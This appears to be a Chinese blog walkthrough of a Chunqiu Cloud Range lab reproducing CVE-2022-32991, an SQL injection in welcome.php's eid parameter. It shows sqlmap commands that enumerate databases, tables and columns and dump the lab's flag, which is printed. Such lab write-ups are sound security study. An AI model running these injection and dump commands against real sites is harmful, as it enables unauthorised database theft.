本文主要是介绍春秋云境:CVE-2022-32991[漏洞复现],希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
从CVE官网查询该漏洞相关信息
该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞
则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数
开启靶机
先在页面正常注册、登录一个账号。密码随便填
进入了home目录,这里有三个话题可以选择开启
随便选择一个进行开启点击Start即可
进入后查看网页URL
可以看到这里的URL地址就出现了welcome.php和eid参数
使用自动化工具SQLMAP漏洞利用
爆库:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --batch --dbs
拿到了四个数据库,继续选择ctf库进行爆表
爆表:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --batch -D ctf --tables
再继续爆列:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --batch -D ctf -T flag --columns
最后查看flag里面的内容: sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --batch -D ctf -T flag -C flag --dump
flag{3b46abc2-3846-417c-84ae-49b54dfdeb7b}
这篇关于春秋云境:CVE-2022-32991[漏洞复现]的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!